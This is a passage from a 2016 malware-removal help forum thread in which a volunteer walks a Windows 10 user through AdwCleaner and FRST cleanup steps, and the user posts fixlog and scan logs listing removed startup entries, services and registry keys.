HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT22 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaTgg => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT5 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT4 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QwaT1 => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\BSOD => value removed successfully
"C:\WINDOWS\bsod.hta" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\rst => value removed successfully
"C:\WINDOWS\rst.bat" => not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\\DeleteOnReboot => value not found.
C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat => moved successfully
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Userinit => value restored successfully
HKU\S-1-5-21-470165136-1162808608-978993673-1001\Software\Microsoft\Windows\CurrentVersion\Run\\wdbext => value removed successfully
"C:\Users\RoNiN\AppData\Local\wdbext.dll" => not found.
"C:\ProgramData\AppxikenoZ\Volity.dll" => Value data removed successfully.
"C:\ProgramData\AppxikenoZ" => not found.
"C:\ProgramData\AppxikenoZ\Goldenphase.dll" => Value data removed successfully.
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\User => moved successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A2516833-3348-406A-96A6-26AAA93BF9DE}" => key removed successfully
HKCR\CLSID\{A2516833-3348-406A-96A6-26AAA93BF9DE} => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}" => key removed successfully
HKCR\Wow6432Node\CLSID\{5C255C8A-E604-49b4-9D64-90988571CECB} => key not found. 
kBTNrls => service removed successfully
Muibguaw => service removed successfully
Nijgatfy => service removed successfully
"C:\ProgramData\QsKNKvQ" => not found.
"C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn" => not found.
C:\Users\RoNiN\AppData\Roaming\Kalekuhrin => moved successfully
C:\WINDOWS\system32\nod => moved successfully
C:\WINDOWS\system32\aro => moved successfully
C:\Users\RoNiN\AppData\Roaming\c => moved successfully
C:\ProgramData\1457912307 => moved successfully
C:\Program Files (x86)\GUTD8C6.tmp => moved successfully
C:\Program Files (x86)\GUMD7DA.tmp => moved successfully
C:\WINDOWS\system32\keja => moved successfully
C:\WINDOWS\system32\byeq => moved successfully
C:\Users\RoNiN\AppData\Roaming\Vilvuk => moved successfully
C:\Users\RoNiN\AppData\Roaming\MirhMevf => moved successfully
"C:\Users\RoNiN\AppData\Roaming\Kalekuhrin" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FAC6784A-CB17-4B4D-BDC7-4A4F34BACBE2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FAC6784A-CB17-4B4D-BDC7-4A4F34BACBE2}" => key removed successfully
C:\WINDOWS\System32\Tasks\{08080F47-0D0F-0F09-7D11-7A79790B110F} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{08080F47-0D0F-0F09-7D11-7A79790B110F}" => key removed successfully
 
 
The system needed a reboot.
 
==== End of Fixlog 15:23:30 ====

#4 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,086 posts
  • OFFLINE
    •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:01:32 PM

Posted 08 April 2016 - 02:56 PM

Hi Ronins8,
 
We will get to that in time, once the computer is clean :)
 
Please download AdwCleaner by Xplode and save to your Desktop.

  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator
  • The tool will start to update the database, please wait a bit.
  • Click on I agree button.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Report button...a logfile (AdwCleaner[R#].txt) will open in Notepad for review (where the largest value of # represents the most recent report).
  • The contents of the log file may be confusing. Unless you see a program name that you know should not be removed, don't worry about it. If you see an entry you want to keep, let me know about it.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool.

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~

#5 Ronins8

Ronins8
  • Topic Starter

  • Members
  • 22 posts
  • OFFLINE
    •  
  • Local time:02:32 PM

Posted 08 April 2016 - 10:36 PM

Hi Toffee!

Here is the log from adwcleaner.  Just to note I didn't hit the 'clean' button after the scan.

 

Thanks,

RoNiN

 

 

 

# AdwCleaner v5.109 - Logfile created 08/04/2016 at 23:29:09
# Updated 04/04/2016 by Xplode
# Database : 2016-04-07.1 [Server]
# Operating system : Windows 10 Home  (x64)
# Username : RoNiN - RONIN-LAPTOP
# Running from : C:\Users\RoNiN\Downloads\AdwCleaner.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
 
***** [ DLL ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F56ACA29-1C99-40F1-AC64-2E44C4F6BC71}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{11D5E9EA-3117-4389-8E58-742F0975C980}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{12D3E096-0FDF-42CC-8F44-04944F9C1648}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{22389F39-2CF4-47C4-B8B2-273BB16BF70C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{23E3CEB3-D63A-433E-A5D0-4DB1C501B915}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{26A3152F-CF87-4C5B-8093-4D4B9EC084EB}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2723E96B-905F-4C64-8999-D868A08E6370}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{29E3319C-4B3C-479F-8692-BDD2CA30BEDD}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2FCB4E7E-E5C7-4D07-BB2C-78DF2DA867AD}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{367BD1CD-74A3-451F-B1A4-6A2DE4129A2D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3D592FCB-FEFD-43A6-9A4F-BDE2D4607D07}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{49F018EE-F362-4B5B-8EC8-BCF9246ABF21}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{63B73044-FC1A-4FE1-991B-FDBD4CDAA868}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{67E5E37C-E6B8-4782-877D-E9437C4CD982}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{686D40BC-FA43-4317-8474-E634E6B487F2}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7207E52B-821E-4C05-A8D6-2965B2BE77CF}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{863FCF5D-DC39-4DA9-AF32-CB0025990EEE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{A310B105-FB7D-4497-A7E8-E046462B012F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B09E015A-4D4E-4F8D-A436-95E19140947D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B1E712C4-03AA-495F-B0F5-0F057E126E2A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D13DC65C-C77B-4986-9078-DEA3D34C71BB}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{DF522774-8CA0-4B15-A93A-5F61AB95DA1C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F9A10D86-182A-4946-869B-70C3D109D14D}
Key Found : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\mpc.am
 
***** [ Web browsers ] *****
 
 
*************************
 
C:\AdwCleaner\AdwCleaner[C1].txt - [20165 bytes] - [07/04/2016 16:19:41]
C:\AdwCleaner\AdwCleaner[S1].txt - [20704 bytes] - [07/04/2016 16:15:59]
C:\AdwCleaner\AdwCleaner[S2].txt - [885 bytes] - [07/04/2016 16:30:45]
C:\AdwCleaner\AdwCleaner[S3].txt - [957 bytes] - [07/04/2016 16:46:57]
C:\AdwCleaner\AdwCleaner[S4].txt - [1029 bytes] - [07/04/2016 17:52:54]
C:\AdwCleaner\AdwCleaner[S5].txt - [1103 bytes] - [08/04/2016 13:20:32]
C:\AdwCleaner\AdwCleaner[S6].txt - [3087 bytes] - [08/04/2016 23:29:09]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S6].txt - [3160 bytes] ##########

Edited by Ronins8, 08 April 2016 - 10:37 PM.

#6 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,086 posts
  • OFFLINE
    •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:01:32 PM

Posted 09 April 2016 - 02:46 PM

Hi Ronins8,
 
Double click on AdwCleaner.exe to run the tool again.

  • The tool will start to update the database, please wait a bit.
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer like it did before.
  • After the scan has finished.
  • This time click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S#].txt) will open automatically (where the largest value of # represents the most recent report).
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

--------------

Please re-run FRST, put a check into the box next to Addition.txt and press the scan button. It will produce FRST.txt and Addition.txt logs located on the desktop. Please copy and paste the logs into your next reply.
 
xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~

#7 Ronins8

Ronins8
  • Topic Starter

  • Members
  • 22 posts
  • OFFLINE
    •  
  • Local time:02:32 PM

Posted 09 April 2016 - 03:41 PM

Thanks again Toffee! Here are the 3 logs - 

 

 

# AdwCleaner v5.109 - Logfile created 09/04/2016 at 16:11:57
# Updated 04/04/2016 by Xplode
# Database : 2016-04-09.1 [Server]
# Operating system : Windows 10 Home  (x64)
# Username : RoNiN - RONIN-LAPTOP
# Running from : C:\Users\RoNiN\Downloads\AdwCleaner.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
 
***** [ DLL ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F56ACA29-1C99-40F1-AC64-2E44C4F6BC71}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{11D5E9EA-3117-4389-8E58-742F0975C980}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{12D3E096-0FDF-42CC-8F44-04944F9C1648}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{22389F39-2CF4-47C4-B8B2-273BB16BF70C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{23E3CEB3-D63A-433E-A5D0-4DB1C501B915}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{26A3152F-CF87-4C5B-8093-4D4B9EC084EB}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2723E96B-905F-4C64-8999-D868A08E6370}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{29E3319C-4B3C-479F-8692-BDD2CA30BEDD}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2FCB4E7E-E5C7-4D07-BB2C-78DF2DA867AD}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{367BD1CD-74A3-451F-B1A4-6A2DE4129A2D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3D592FCB-FEFD-43A6-9A4F-BDE2D4607D07}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{49F018EE-F362-4B5B-8EC8-BCF9246ABF21}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{63B73044-FC1A-4FE1-991B-FDBD4CDAA868}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{67E5E37C-E6B8-4782-877D-E9437C4CD982}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{686D40BC-FA43-4317-8474-E634E6B487F2}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7207E52B-821E-4C05-A8D6-2965B2BE77CF}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{863FCF5D-DC39-4DA9-AF32-CB0025990EEE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{A310B105-FB7D-4497-A7E8-E046462B012F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B09E015A-4D4E-4F8D-A436-95E19140947D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{B1E712C4-03AA-495F-B0F5-0F057E126E2A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D13DC65C-C77B-4986-9078-DEA3D34C71BB}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{DF522774-8CA0-4B15-A93A-5F61AB95DA1C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F9A10D86-182A-4946-869B-70C3D109D14D}
Key Found : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\mpc.am
 
***** [ Web browsers ] *****
 
 
*************************
 
C:\AdwCleaner\AdwCleaner[C1].txt - [20165 bytes] - [07/04/2016 16:19:41]
C:\AdwCleaner\AdwCleaner[S1].txt - [20704 bytes] - [07/04/2016 16:15:59]
C:\AdwCleaner\AdwCleaner[S2].txt - [885 bytes] - [07/04/2016 16:30:45]
C:\AdwCleaner\AdwCleaner[S3].txt - [957 bytes] - [07/04/2016 16:46:57]
C:\AdwCleaner\AdwCleaner[S4].txt - [1029 bytes] - [07/04/2016 17:52:54]
C:\AdwCleaner\AdwCleaner[S5].txt - [1103 bytes] - [08/04/2016 13:20:32]
C:\AdwCleaner\AdwCleaner[S6].txt - [3331 bytes] - [08/04/2016 23:29:09]
C:\AdwCleaner\AdwCleaner[S7].txt - [3160 bytes] - [09/04/2016 16:11:57]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S7].txt - [3233 bytes] ##########
 
 
FRST:::::
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by RoNiN (administrator) on RONIN-LAPTOP (09-04-2016 16:28:46)
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Emsisoft Ltd) C:\Program Files\Emsisoft Anti-Malware\a2service.exe
(MAGIX AG) C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MSIService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(Thrustmaster®) C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files (x86)\PostgreSQL\8.3\bin\postgres.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Google Inc.) C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\MusicManager.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10816544 2010-05-25] (Realtek Semiconductor)
HKLM\...\Run: [THXCfg64] => C:\windows\system32\RunDLL32.exe C:\windows\system32\THXCfg64.dll,RunDLLEntry THXCfg64
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [3738336 2015-10-31] (ELAN Microelectronics Corp.)
HKLM\...\Run: [emsisoft anti-malware] => c:\program files\emsisoft anti-malware\a2guard.exe [9404304 2016-04-08] (Emsisoft Ltd)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [MGSysCtrl] => C:\Program Files (x86)\System Control Manager\MGSysCtrl.exe [2486272 2010-06-04] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [THX Audio Control Panel] => C:\Program Files (x86)\Creative\THX TruStudio Pro\THXAudioCP\THXAudio.exe [1349632 2010-05-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [CitrixReceiver] => "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix\Receiver Updater.lnk"
HKLM-x32\...\Run: [TkBellExe] => "C:\Users\RoNiN\update\realsched.exe"  -osboot
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [407904 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [153952 2015-04-08] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595480 2016-03-20] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\WINDOWS\SYSTEM32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [Google Update] => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc.)
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [SideSync] => C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe [9580864 2015-10-13] ()
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [MusicManager] => C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\MusicManager.exe [7643136 2015-11-17] (Google Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\RoNiN\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\FileSyncShell.dll [2015-10-03] (Microsoft Corporation)
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{9cc31965-f3ac-45a8-a3c1-a9ad1c45f485}: [DhcpNameServer] 192.168.6.1 64.134.255.2 64.134.255.10
Tcpip\..\Interfaces\{c78fcb73-f14a-4b1e-b0ad-7bf0f8fa0b67}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
SearchScopes: HKLM -> OldSearch URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSITDF&pc=MAMI&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {0F462454-2A7D-48CE-B2B5-ECD4B55B6026} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {C9D867C8-1E65-4F71-970A-C677CAECFCC3} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {DF74C2BD-9885-45D2-AC3E-F2865A90DEAB} URL = 
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2013-04-16] (RealDownloader)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-01-14] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_77\bin\jp2ssv.dll [2016-03-29] (Oracle Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {67DABFBF-D0AB-41FA-9C46-CC0F21721616} hxxp://download.divx.com/player/DivXBrowserPlugin.cab
DPF: HKLM-x32 {6C269571-C6D7-4818-BCA4-32A035E8C884} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15101/CTSUEng.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://connect.bedbath.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://ccfiles.creative.com/Web/softwareupdate/su/ocx/15112/CTPID.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
